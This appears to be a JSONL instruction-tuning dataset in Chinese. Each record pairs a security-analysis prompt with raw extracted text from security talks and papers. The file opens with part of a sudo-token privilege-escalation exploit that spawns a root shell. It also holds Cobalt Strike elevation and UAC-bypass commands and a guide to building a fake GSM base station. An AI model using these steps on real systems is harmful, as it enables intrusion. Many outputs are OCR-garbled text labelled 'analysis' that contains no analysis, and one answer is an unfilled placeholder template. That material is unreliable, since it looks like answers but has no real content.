/home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> bash #[*] Path 1842: /home/s4vitar #[*] PID -> bash #[*] Path 1852: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> bash #[*] Path 1857: /home/s4vitar/Desktop/Exploit/Privesc # #[*] Cleaning up... [] #[*] Spawning root shell... [] # #bash-4.4# whoami #root #bash-4.4# id #uid=1000(s4vitar) gid=1000(s4vitar) euid=0(root) egid=0(root) grupos=0(root),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112 (debian-tor),124(bluetooth),136(scanner),1000(s4vitar) #bash-4.4# function startAttack(){ while [ ! -f /tmp/bash ]; do tput civis && pgrep \"(echo $(cat /etc/shells | tr '/' ' ' | awk 'NF{print $NF}' | tr '\\n' '|'))$\" -u \"$(id -u)\" | sed '$ d' | while read shell_pid; do if [ $(cat /proc/$shell_pid/comm 2>/dev/null) ] || [ $(pwdx $shell_pid 2>/dev/null) ]; then echo \"[*] PID -> \"$(cat \"/proc/$shell_pid/comm\" 2>/dev/null) echo \"[*] Path $(pwdx $shell_pid 2>/dev/null)\" fi; echo 'call system(\"echo | sudo -S cp /bin/ba", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlog PaddingOracle攻击 2021-08-10  密码学 根据加解密时是否用同一组密钥可以分为对称加密和非对称加密对称加密中根据对数据处理粒度的不 同可以分为分组加密算法AES3DESDESBlowfishRC2CAST和流加密算法ChaCha20 Salsa20RC4 常见的非对称加密算法有RSAElGamalDSAECC等 分组加密算法中根据加解密时对数据的分组编排方式经典工作模式有ECBCBCPCBCCFBOFBCTR 等其中后三者可以将分组加密转化为流加密形式为了在保证机密性的前提下进一步保证完整性现代工 作模式有CCMCBC-MACEAXGCMSIVSynthetic Initialization VectorOCBOffset CodeBook 等 分组加密方式简介 分组加密方式只能使用一个固定大小的密钥加密相同字节长度的明文所以需要将加密的明文按照密钥大小 拆分为多块所以也叫块加密如果拆分后最后一个块明文长度不够就需要填充字节来补齐长度按照 常见的PKCS#5或PKCS#7标准最后需要填充几个字节那么所填充的字节的值就用几如果明文最后一个块 刚好满足长度大小那就需要填充完整一个块 举个例子对称密钥为 12345678 时长度为8当待加密的明文为 abcdefg 时其长度为7填充后的块为 [a] [b][c][d][e][f][g][0x01] ;当待加密的明文为 abcdefghabcdef 时其长度为14填充后的块为 [a][b][c][d] [e][f][g][h][a][b][c][d][e][f][0x02][0x02] 当待加密的明文为 abcdefgh 时其长度为8填充后的块为 [a][b][c][d][e][f][g][h][0x08][0x08][0x08][0x08][0x08][0x08][0x08][0x08]  异或和可逆性 异或的概念对于二进制位而言就是两个位不同则得到1两个位相同则得到0比如 可以看出异或的结果与参与运算的两个值先后顺序没有关系按小学的说法可以称为异或交换律= = 再看仔细一些可以知道如果AB=C那么AC=BBC=A说明异或具有可逆性 两个十进制的异或就是都转为二进制再逐位异或两个字节的异或就是对字节取ASCII码十进制 再两个长度相同字符串的异或就是逐字节所以字符串的异或本质就是二进制位的异或这说明 异或的可逆性同样适用于字符串 CBC工作模式简介 首页 标签 分类 关于 文章目录 分组加密方式简介 异或和可逆性 CBC工作模式简介 PaddingOracle 推导明文 构造密文 没有IV与IV不可 Python实现 参考链接 1 2 3 4 1  1 = 0 1  0 = 1 0  1 = 1 0  0 = 0 Python Plaintext指明文块Ciphertext指密文块key指对称密钥  符号表示异或 IVInitialization Vector是每次加密时都应随机生成的一串与分块大小相同的随机值随机IV的存在使得相 同的对称密钥加密两次相同的明文也会得到不同的密文规避了ECB模式相关安全问题如果某些具体实现 中IV重复使用或是可以预测亦或是使用全0的IV则会导致明文块泄漏但这不是本文讨论的重点 加密时先将第一块明文与初始IV异或再将异或后的块用对称密钥加密得到第一块密文第一块密文会作为 第二块的IV与第二块明文异或后再用对称密钥加密得到第二块密文直到最后一块密文加密完成 从第二块明文开始每块明文加密都需要用到上一块的密文作为IV加密过程无法并行 解密时先将密文用对称密钥解密得到一个中间值将此中间值与IV异或得到明文注意我现在没有说第一块 了因为IV此时都是已知的每两个密文块就可以解出一个明文块解密过程可以并行 因为解密第一块密文时需要初始的IV而初始IV在密码学中本就没有保密性要求通常都会将初始IV拼接到密 文头部一起发给客户端至于为什么拼接在头部而不是尾部或是单独分开因为上一块密文就是下一块密文 IV拼接到头部其实就是让IV作为第零块密文顺其自然地成为第一块密文的IV PaddingOracle PaddingOracle一般是指对称加密算法CBC工作模式的一种攻击方式如果能够区分密文解密出错的原因是 由于填充错误比如填充的 [0x01][0x02] 还是由于正常解密出的明文在具体的业务环境中报错比如判 断role是 admin 还是 member 结果解密出来是 !@#$ 就能在不知道对称密钥的情况下利用错误回显或 是时间延迟的侧信道爆破和推测出密文被对称密钥解密后的 中间值进一步可以推测出密文被完整解密后 的 原始明文或是利用中间值结合可控的IV逆推构造出 想要的明文 利用错误回显或是时间延迟做判断的这个过程就称为oracle 推导", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGame of Drones PUTTING THE EMERGING DRONE DEFENSE MARKET TO THE TEST DEF CON 25 (2017)  LAS VEGAS, NV July 29, 2016 Presented by:  Francis tastic Brown  David Latimer Bishop Fox, LLC www.bishopfox.com 2 1. The Danger Drone by Bishop Fox 2. Crazy State of Drone Defense Market 3. Drone Legal Landscape 4. Future Is Gonna Be Awesome OVERVIEW Agenda 3 MOTIVATIONS BEHIND THIS TALK No Such Thing as Drone Defense Best Practices  Companies are beginning to implement 1st generation drone defense solutions / products o P r e v i o u s p r o o f o f c o n c e p t s h a v e a l r e a d y d e m o n s t r a t e d t h a t t h e t h r e a t i s r e a l  There are no best practices or proven methods for defense against drones  Practical pentesting tools are needed to test the effectiveness of these new drone defense deployments o S e p a r a t i n g r e a l c o u n t e r m e a s u r e s f r o m s n a k e o i l o M u s t b e c h e a p , e a s y t o b u i l d , a n d e a s y t o l e a r n h o w t o u s e f o r s e c u r i t y p r o f e s s i o n a l s DANGER DRONE FOR PENETRATION TESTERS 5 FREE PENTESTING DRONE FROM BISHOP FOX Welcome to the Danger Drone  https://www.bishopfox.com/resources/tools/drones-penetration-testers/ Raffle: http://tiny.cc/dangerdrone 6 HACKING PERIPHERALS  ADD-ON USB EXAMPLES Parts  Hacking Over the Air  Custom 3D printed 3rd shelf is convenient for attaching hacking USB peripherals: TP-Link TL-WN722N 3D Printed 3rd Shelf 7 HACKING PERIPHERALS  ADD-ON USB EXAMPLES Parts  Hacking Over the Air Atmel  ZigBee Hacking Gear SENA UD100 Bluetooth USB HackRF One: Software Defined Radio TP-Link TL-WN722N Wi-Spy DBx Pro  USB Spectrum Analyzer  Wi-Fi  Bluetooth  RFID / NFC  ZigBee  Software Defined Radio  Wireless Keyboard Sniffers  ... Bluetooth 4.0 USB Micro Adapter (CSR 8510 Chipset) Asus USB-N53 (dual band) WiFi Pineapple Nano DEMO 9 FLY-BY DRONE EXPLOITATION, HIT AND RUN HACKING DEMO: Exploiting Wireless Mouse via Drone  http://dangerdrone.io/ + https://github.com/ins", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Review of Mind Wars: Brain Research and National Defense By Jonathan D. Moreno Dana Press (The Dana Foundation: New York and Washington DC) 2006 by Richard Thieme What we dont know is so much bigger than we are. A Haitian Proverb Oh, how I wish that reviewing a book like this were simple and straightforward! That would mean we live in a world of transparency, government accountability to citizens, easy access to sources, primary sources willing to go on the record, and data trails that lead readers to those same sources so everyone can see for themselves. But alas, we do not live in such a world. Mind Wars is a broad but necessarily incomplete overview of neuroscience, nanotechnology and related areas applied to the arts of war, with an examination of ethical issues raised by this work, all considered in a historical context by a scholar who has researched the field. The key to decoding the book, however, is on page 4 of the introduction. I am no loose cannon, writes Jonathan D. Moreno, Ph. D., the Emilie Davie and Joseph S. Kornfeld Professor and Director of the Center for Biomedical Ethics at the University of Virginia. I am deeply entrenched in the non-threatening, even boring, academic establishment. Ive taught at major research universities, hold an endowed chair at an institution not known as a hotbed of radicalism  and on the disclaimer goes, a plea to the reader to recognize that the author is no kook, no conspiracy theorist, but a respectable, conventional man. Moreno sounds those notes again, on p. 107, for example, when he states that he has considerable experience with governmenton the staffs of presidential advisory committees, in [giving] congressional testimony, and so forth. Those qualifications define the subtext of this work and in many ways the subtext is the primary content. They also suggest one reason why the exploration of the frontiers of military research and development and the penetration of the military-industrial- academic-scientific-m", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 0x00 Elevate 在Cobalt Strike中内置了3种提权模式 1. ms14-058是一个过时的权限升级漏洞利用程序可用于未打补丁的Windows 7系统提权 2. UAC DLL是一种绕过UAC的攻击它试图将本地管理员运行的有效负载从低权限提升到高权限此攻击使用UAC漏洞将ArtifactKit生成的DLL复制到特权位置此攻击适用于Windows7和Windows8及更高版本的未修补版本 3. uac-token-duplication是另一种绕过UAC的攻击将其从低权限提升到高权限作为本地管理员这种攻击使用一个UAC漏洞允许非提升进程使用从提升进程中窃取的令牌启动任意进程此漏洞要求攻击删除分配给提升令牌的多个权限此攻击适用于Windows7及更高版本如果AlwaysNotify处于其最高设置则此攻击要求提升的进程已在当前桌面会话中运行作为同一用户,此漏洞使用PowerShell生成会话 当然这三种远远不满足我们的需求的,后面讲到脚本的导入利用 >使用 右键目标> Access > Elevate 选择提权方法 ![Cobalt Strike ](./img/12.1.png) 可以看到我们的权限直接提升到system了 Cobalt Strike更msf命令有着相识的地方 也有`getsystem`命令 可以用来提权 ``` beacon> help getsystem Use: getsystem Attempts to get SYSTEM [+] host called home, sent: 37 bytes [+] received output: nt authority\\system ``` 获得system权限我们运行一个system beacon 有太多种方法了我这里就顺便配合 `inject` 命令 ``` beacon> help inject Use: inject [pid] <x86|x64> [listener] Open the process and inject shellcode for the listener ``` 当然也可以使用图形化的来操作 > 目标 >explore > process list ![Cobalt Strike ](./img/12.4.png) `inject``spawnas``spawn` 都可以用来进行协议切换 # 0x01 bypass uac 用户帐户控制User Account Control简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权以达到帮助阻止恶意程序有时也称为恶意软件损坏系统的效果 前面内置提权有三种模式其中就有uac的 命令行还有一种引用bypass uac的方法 ``` beacon> help bypassuac Use: bypassuac [listener] Spawn a session in a high integrity process. Use this command to elevate from a process run by an administrator, but without administrator rights to a high integrity process with the user's full rights. This command drops a DLL to disk, uses a trust loophole to copy the DLL to a system folder, and executes a program that auto-elevates to high integrity to load the DLL. ``` ![Cobalt Strike ](./img/12.2.png) 图中可以看到我的用户开始是 Medium Mandatory Level 权限 并且 Aleen 后面没有 `*`(表示最高权限) bypass uac后成功获得最高权限 # 0x02 powershell 使用这个我们需要了解2个命令 ``` beacon> help powershell-import Use: powershell-import [/path/to/local/script.ps1] Import a powershell script which is combined with future calls to the powershell command. You may only use one imported s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 spring beans RCE Spring MVC 框架的参数绑定功能提供了将请求中的参数绑定控制器法中参数对象的成员变量攻击 者通过构造恶意请求获取AccessLogValve 对象并注恶意字段值触发 pipeline 机制可写任意路径下 的件 简答来说就是参数绑定造成的变量覆盖漏洞漏洞点spring-beans包中  JDK>=9 springMVC 全版本 根据之前的漏洞分析 http://rui0.cn/archives/1158其中个点在于获取BeanInfo位置在CachedIntrospectionResults 构造法下个断点发送请求断下 漏洞介绍 漏洞编号 影响范围 漏洞分析 属性注分析 2 之前的补丁是把classLoader等危险属性过滤掉了 跟踪如上堆栈发现新版本和旧版本参数绑定的类有所不样具体位置如下setPropertyValue也叫 属性注 org\\springframework\\beans\\AbstractNestablePropertyAccessor.class#setPropertyValue 3 补充AbstractNestablePropertyAccessor 类通过其成员属性提供了种持嵌套属性的数据结构 这段的理解参考 https://www.cnblogs.com/binarylei/p/10267928.html getPropertyAccessorForPropertyPath 根据属性(propertyPath)获取所在 bean 的包装对象 beanWrapper如果是类似 director.info.name 的嵌套属性则需要递归获取真正获取指定 Java 复制代码 // 1. 递归获取 propertyName 属性所在的 beanWrapper如 director.info.name 获 取 name 属性所在的 info bean AbstractNestablePropertyAccessor nestedPa = getPropertyAccessorForPropertyPath(propertyName); // 2. 获取属性的 token PropertyTokenHolder tokens = getPropertyNameTokens(getFinalPath(nestedPa, propertyName)); // 3. 设置属性值 nestedPa.setPropertyValue(tokens, new PropertyValue(propertyName, value)); 1 2 3 4 5 6 4 属性的包装对象则由法 getNestedPropertyAccessor 完成 可以看到 getPropertyAccessorForPropertyPath 的递归调 也就是bean属性的递归获取如我这个环境中最外层BeanWrapperImpl封装的是UserInfo我传参 是 Java 复制代码 protected AbstractNestablePropertyAccessor getPropertyAccessorForPropertyPath(String propertyPath) { // 1. 获取第个点之前的属性部分eg: director.info.name 返回 department int pos = PropertyAccessorUtils.getFirstNestedPropertySeparatorIndex(propertyPath); // 2. 递归处理嵌套属性 // 2.1 先获取 director 属性所在类的 rootBeanWrapper // 2.2 再获取 info 属性所在类的 directorBeanWrapper // 2.3 依此类推获取最后个属性 name 属性所在类的 infoBeanWrapper if (pos > -1) { String nestedProperty = propertyPath.substring(0, pos); String nestedPath = propertyPath.substring(pos + 1); AbstractNestablePropertyAccessor nestedPa = getNestedPropertyAccessor(nestedProperty); return nestedPa.getPropertyAccessorForPropertyPath(nestedPath); // 3. 当前对象直接返回 } else { return this; } } 1 2 3 4 5 6 7 8 9 10 11 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 TAKING WINDOWS 10 KERNEL EXPLOITATION TO THE NEXT LEVEL  LEVERAING WRITE-WHAT-WHERE VULNERABILITIES IN CREATORS UPDATE Morten Schenk msc@improsec.com Contents Abstract ............................................................................................................................................................. 2 Background and Windows Kernel Exploitation History ..................................................................................... 3 Kernel Read and Write Primitives ..................................................................................................................... 4 Windows 10 Mitigations .................................................................................................................................... 7 Windows 10 1607 Mitigations ........................................................................................................................... 8 Revival of Kernel Read and Write Primitives ..................................................................................................... 8 Windows 10 1703 Mitigations ......................................................................................................................... 12 Revival of Kernel Read and Write Primitives Take 2 ....................................................................................... 14 Kernel ASLR Bypass .......................................................................................................................................... 17 Dynamic Function Location ............................................................................................................................. 22 Page Table Randomization .............................................................................................................................. 23 Executable Memory Allocation ....................................................................................................................... 25 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 线下攻防经验小结 首先正常比赛会提供提交 flag 的接口接口地址类似 `http://172.16.4.1/Common/submitAnswer`一般我们需要根据主办方给出的文档要求通过接口提交 flag在比赛中要求接口地址使用 Post 方式提交提交时带两个参数一个是 `Answer`其值为获取到的 flag 字符串而另一个则是 `token` 其值为各个队伍的队伍 Token 然后比赛时主办方也会给每个参赛队伍提供一台用于 **分析网络流量的虚拟机** 选手需要访问地址下载流量文件进行分析 ### 线下攻防经验关于关注 Gamebox 状态 比赛中可以查看己方和敌方 GameBox 状态时刻关注可以尽早获取比赛信息根据信息做出调整 对于己方 GameBox有存在如下原因造成 GameBox 被 down 掉 1. 主办方裁判系统存在失误误判 GameBox 为不可用状态这种情况一般在比赛开始前可以发现如果发现存在这种情况要尽早向工作人员示意处理以减少损失 2. 程序 patch 失误导致服务不可用在程序 patch 完之后要进入下一轮关注 GameBox 状态如果 patch 失误导致不可用需要及时挽救但是也不要过度担心把原来的未修补过的漏洞程序换回去因为 down 掉是所有队平分得很少的分而直接上漏洞程序会使得强势的队伍直接利用得到很高的得分所以要依据具体情况对待 3. 对手不正当攻击导致 GameBox 不可用如果发现需要及时补救 4. 主办方加强程序 check这种情况主办方会对所有队员进行通知公告在 GameBox 状态墙上的状态会显示该题的各队 GameBox 大面积不可用 对于敌方 GameBox我们可以获取以下信息 1. 根据攻击流观测哪些队伍的 GameBox 没有防御成功针对这些队伍可以更多地实现攻击 2. 有队伍拿出一血时可以根据各队 GameBox 状态推断出一血队伍是否已经写出利用脚本写出利用脚本后可以观测己方是否做好了防御 ### 线下攻防经验关于分清区段与端口 比赛过程中会主办方会安排好合理的网段分布 维护的时候需要连接到本队 GameBox 所在网段上根据主办方提供的 CTF 账号与密码登录而与其他队伍的 GameBox 交互时则需要连接到对应的网段里与漏洞程序进行交互提交 flag 则需要到指定的答题平台上提交 !!! warning 这里尤其需要注意的就是端口如果端口在不轻易间弄错的话这样的错误是挺难察觉到的而这样的失误也会带来不必要的损失甚至会出现长时间无法提交 flag 的致命情况所以需要小心注意 ### 线下攻防经验关于服务 patch 与防御 1. 程序 patch 要合理并同时符合裁判系统 check 条件虽然系统的 check 并未公开是 check 哪里但是一般情况下系统是不会过度为难的 2. 程序 patch 使用 IDA 进行修改IDA 提供了三种方式的 patchbytewordassemble.其中字节码修改比较好用因为逐字节修改不需考虑汇编指令一般这样的修改改动也很小在一定场合下十分好用汇编指令级别的修改虽然方便不需要修改字节码但是也造成了一定的不便比如需要额外考虑汇编指令的长度结构是否合理完整逻辑是否和原来一样修改的汇编指令是否合法等问题 3. 在 patch 程序时要记得备份原来的漏洞程序以供队伍分析使用在上传 patch 的时候应该先删除原来的漏洞程序然后将 patch 过的程序复制进去复制进去之后还需要给程序赋予相应的权限 4. 一般比赛中漏洞程序会有十几处需要 patch 的地方Patch 的时候不仅要讲究有效合理还要满足能够在一定程度上防范或混淆对手的分析 ### 线下攻防经验关于构造脚本框架快速展开攻击 在攻防比赛过程中一血显得尤其重要因此有一个攻击脚本框架是非常有利的快速开发攻击脚本可以在前期保持优势地位也可以在不断拿分的同时省下时间去做好防御 ### 线下攻防比赛的一些策略 1. 在比赛过程中不宜死耗在一道题上由于一血的优势性在比赛过程中更应该全面了解赛题难度先从 **简单题** 开始进行分析步步为营 2. 比赛过程中两极会严重分化应该着力打击和自己实力相当和比自己队伍更强的队伍尤其是分数相差无几的情况下更要严防严守 3. 比赛中 NPC 会不定时发出攻击流量从攻击流量中可以得到 payload 4. 一定要把 NPC 往死里打 5. 在开赛初可以将所有的管理密码都设置为同一个密码这样方便队员登录管理在初期将所有文件备份下来供队内分享", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON! 2015! Introduction to SDR & the Wireless Village ! Who the Frig...! satanklawz! ! DaKahuna! It takes a village...! Rick Mellendick! Zero_Chaos! Marauder! Terrible! ! RedBaron! SimonJ! Spiral Suitcase! 0xAA! Agenda for the next 45 minutes!  Ham Radio Transceivers!  SDR Rx/Tx!  Antenna Theory from Ham to SDR !  The (S) in SDR!  Common problems with SDR Labs !  A bit of fun!  Take all this stuff to the Village! Materials Checklist if you wanna follow!  RTL-SDR!  Modern Laptop!  Pentoo!  Headsets!  Antennas! Oops...! Dont have something?! ! DEF CON Vendors Hacker!Warehouse! !Hak5 ! !! Nuand ! !SimpleWiFi!! Frys Electronics! Address: 6845 S Las Vegas Blvd, Las Vegas, NV 89119! Phone:(702) 932-1400! Hours: 9:00 am  8:00 pm! ! ! HAM Radio Transceivers  Fixed ! Frequencies: HF, VHF, UHF, ! VHF/UHF! ! Power Output: 100  200 Watts! ! Cost: $1,000 and up! ! Source: http://digichar.com/unt/17066-yaesu_ft___901dm_hf_ham_radio_transceiver.html! http://www.airadio.com/Icom-Transceiver-IC-7800*productID_293-products_details! ! HAM Radio Transceivers  Mobile ! Frequencies: HF, VHF, UHF, ! VHF/UHF! ! Power Output: 40  50 Watts! ! Cost: $300 - $500! ! Source: http://www.hamradio.com! ! HAM Radio Transceivers  Handheld! Frequencies: VHF, UHF, ! VHF/UHF! ! Power Output: 4  5 Watts! ! Cost: $35 - $300! ! Source: http://www.hamradio.com! ! HAM Radio Transceivers - Virtual! HamSphere! Java Based (Windows, OS X, ! Just add microphone (headset recommended) ! HAM Radio Transceivers - SDR! BladeRF(Nuand)! Frequency: 300Mhz-3.8Ghz! Power: ~6 dBm (4 mW)! Cost: $420(x40) $650 (X115)! ! HackRF (GreatScott Gadgets)! Frequency: 1Mhz  6 Ghz! Power: 0-15 dBm (1-32mW)! Cost: $330! HAM Radio Transceivers (contd)! Interesting uses:! Satellite communications! Earth-moon-earth (EME)! Packet Radio! Radio Teletype (RTTY)! Internet Radio Linking Project (IRLP)! Morse Code! SDR Rx/Tx! RTL-SDR ; RX only! HackRF ; TX and RX capable SDR board thats hugely affordable! BladeRF ; TX and RX in an affordable s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请解释目录遍历的原理和防护方法", "input": "", "output": "目录遍历是一种常见的网络安全威胁。攻击原理：[具体原理说明]。防护措施：1. [防护方法1] 2. [防护方法2] 3. [防护方法3]", "category": "security_knowledge", "source": "manual"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env ruby require 'sinatra/base' require 'sinatra/cookies' require 'openssl' require 'json' KEY = IO.binread('super-secret-key') FLAG = IO.read('/home/simple/flag').strip class SimpleApp < Sinatra::Base helpers Sinatra::Cookies get '/' do auth = cookies[:auth] if auth begin auth = auth.b c = OpenSSL::Cipher.new('AES-128-CFB') c.decrypt c.key = KEY c.iv = auth[0...16] json = c.update(auth[16..-1]) + c.final r = JSON.parse(json) if r['admin'] == true \"You're admin! The flag is #{FLAG}\" else \"Hi #{r['username']}, try to get admin?\" end rescue StandardError 'Something wrong QQ' end else <<-EOS <html><body><form action='/' method='POST'> <input type='text' name='username'/> <input type='password' name='password'/> <button type='submit'>register!</button> </form></body></html> EOS end end post '/' do username = params['username'] password = params['password'] if username && password data = { username: username, password: password, db: 'hitcon-ctf' } c = OpenSSL::Cipher.new('AES-128-CFB') c.encrypt c.key = KEY iv = c.random_iv json = JSON.dump(data) enc = c.update(json) + c.final cookies[:auth] = iv + enc redirect to('/') else 'Invalid input!' end end end", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n反间谍计划 自建基站与数据嗅探方法论 百度安全实验室 小灰灰 关于我 百度安全实验室 高级安全研究员 研究领域IoT安全/AI安全/无人车 安全 多次破解硬件设备 之前负责  BSRC应急处置0day分析  百度产品 安全评估  百度安全监控体系建设 大纲  联网IOT设备测试目的测试方法  如何实现自动附着MITM流量量  如何搭建LTE测试基站  漏漏洞洞实例例介绍  其他测试方法 目的及守则  目的  了了解GSM的安全风险  通过搭建测试基站辅助IOT设备安全漏漏 洞洞挖掘  增强产品安全性  测试守则  严格遵守相关法律律不不影响正常信道通信  屏蔽器器中/封闭地下室操作  如实在条件限制需调低功率/衰减器器直连 测试目的  控制流量量  获取流量量敏敏感数据接口分析固件分析远控&升 级分析  修改流量量MITM中间人DNS欺骗  访问运营商侧interface访问设备 存在漏漏洞洞的端口  控制短信  短信下发指令场景很少 漏漏洞洞挖掘方法  获取云端接口  攻击云端web漏漏洞洞注入升级FTP  client重放越权  获取通讯数据  辅助理理解流程  加密信道辅助分析获取加密密钥获得加解密能力力  获取密码tokensession等关键key  获取固件更更新链接  修改数据  修改配置参数替换固件  注入恶意代码例例如浏览器器RCE  访问监听端口  自身提供管理理服务例例如telnetadbssh  分析监听bin协议模拟/命令注入/溢出攻击  协议基带Fuzz 有时是攻击前 有时在攻击中 两种测试基站需求场景  攻击前  不不需要任意client自动连入我们的攻击基站  只需要目标client能够连入  实现 搭建GSM和LTE测试基站特殊sim卡写卡实现认证  攻击中  需要任意client自动从现网切换到我们的攻击基站  GSM网络存在认证问题可能实现  实现搭建GSM攻击基站通过强制小区重选 连接到攻击 基站 我们先来实现难的-攻击中基站  自动连入攻击基站并且控制流量量  看下腾讯KEEN LAB 攻击宝马车机系统的case G -- Generation  1G 模拟信号 大哥大  2G GSM/CDMA  3G 3GPP WCDMA/CDMA2000  4G LTE  5G 高速率 低延迟 切片 万物互联 时代进步 -- > 技术升级  部分标准在设计之初没有考虑安全问题  模拟已经不不存在不不考虑  GSM存在问题但部分地区已退网不不支持2G  问题已解决  No  所有手机都支持2G  大部分物联网设备通讯模块都工作在2G下不不要求高速数据 GSM安全问题  2G GSM网络在设计之初就存在安全问题  单向鉴权而非双向即只有网络鉴定用户是否合法  导致伪造基站的可能 伪基站应运而生 Just给你发了一个发送号码 和内容可以自定义的短信% 伪基站内部探究  收发板SDR软件无线电  放大器器功率  双工器器电源  外部笔记本+软件Openbts 2.8 通过软件模拟+收发 设备实现GSM基站 系统 伪基站都做了了什什么  用工程机 找个弱频点设置MCCMNC等参数和周围一样 LAC不不一样  手机获知广播消息C1C2还很大呀这得重选小区到这个伪基站发 现LAC变了了这得位置更更新请求  手机傻乎乎的给鉴权信息伪基站看也不不看来者不不拒  手机在伪基站中伪基站看IMSI位置更更新时获取的嗯刚刚没发 过短信发一条  伪基站利利用完手机了了然后踢掉它  开始其他环节钓鱼种马洗卡售卖  Just给你发了了一个发送号码和内容可以自定义的短信 我们需要什什么  不不可以滥发短信不不需要大功率不不可以干扰周 边  只需要实现小区切换自动附着  实际上无需测试请遵守法律律法规  通过修改开源BTS增大C2  另外实现GPRS流量量控制 软件无线电介绍  一种可以接收发送广泛频率的无线电信号的 设备  并且把模拟信号转换成数字信号 交给计算机处理理 开源GSM BTS  软件  OpenBTS难安装  YateBTS基于OpenBTS代码可视化容易易安装  OpenBSC(包含BTS代码重写规范庞大难安装)  硬件  USRP系列列B系列列偏频比较严重  Bladerf x40频率精准  So 我们选择YateBTS+Bladerf x40 如何实现  BTS中小区重选参数C2无法 设置或失效  干脆代码里里写死最高值  基站配置参数  MMCMNC需要与sim卡中一 样  *#0011#  获取较弱的频点  使用工程机GSM模块at指令  SDR扫描工具例例如kalibrate-rtl 其他配置  基础配置  选择频段与频点  配置MCC MNC  配置功率参数 其他配置  网络配置  关闭防火墙  添加i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\niptables-restore === 还原iptables表的配置 ## 补充说明 **iptables-restore命令** 用来还原iptables-save命令所备份的iptables配置 ### 语法 ```shell iptables-restore(选项) ``` ### 选项 ```shell -c指定在还原iptables表时候还原当前的数据包计数器和字节计数器的值 -t指定要还原表的名称 ``` ### 实例 ```shell iptables-restore < iptables.bak ``` iptables.bak是iptables-save命令所备份的文件", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nbeholder DefCon 16 Beholder Nelson Murilo nelson(at)pangeia.com.br Luiz Eduardo le (at) atelophobia.net beholder DefCon 16 Agenda  Who are we?  Evolution of WiFi attacks  Attack tools  Threats  Solutions  The inner of Beholder?  What does Beholder detect?  What Beholder doesn't do  Scenarios  Futures beholder DefCon 16 Wi-Fi Attacks beholder DefCon 16 DoS beholder DefCon 16 MiTM beholder DefCon 16 Impersonation beholder DefCon 16 Surveillance beholder DefCon 16 Packet Injection beholder DefCon 16 Crypto Cracking  WEP  WPA beholder DefCon 16 Client-Side  AdHocs Circa beholder DefCon 16 Rogue APs beholder DefCon 16 Impersonation 2.0  Evil-twin  More rogue-aps beholder DefCon 16 Drive-By Pharming beholder DefCon 16 Faster Crypto-Cracking beholder DefCon 16 Rogue Radius Servers beholder DefCon 16 Tools beholder DefCon 16 beholder DefCon 16 Solutions?  Introduction to WIDS... beholder DefCon 16 JUST KIDDING! beholder DefCon 16 State of WIDS (not the one below) beholder DefCon 16 Any free tools at all?  Roguescanner  ?? beholder DefCon 16 Here comes Beholder  No chipset or 802.11 standard limitations (yes, it works on 802.11n)  Based beacon frames beholder DefCon 16 802.11 Beacons  (sometimes) more than you can expect beholder DefCon 16 beholder DefCon 16 beholder DefCon 16 beholder DefCon 16 Beholder Detects and Reports  Changes on AP (ESSID, MAC, Mode)  Channel changes  Huge signal level variations  Missing Aps  And more... beholder DefCon 16 beholder DefCon 16 Other cool stuff beholder DefCon 16 Things we DON'T do  Sniffing on any interface types  Put 802.11 interfaces in monitor mode (hence not checking for de-auths and such)  WPA/WEP Cracking  Detect client or AP authentication failed beholder DefCon 16 (some of the) design challenges  Easy to install and use  Comprehensive  Scanning time differences per adapter  Madwifi caching issue  Make it with as few dependencies as possible  Written in a fast language  C Ansi beholder DefCon 16 Caveats  For now... beholder DefC", "category": "text_analysis", "source": "security_papers"}
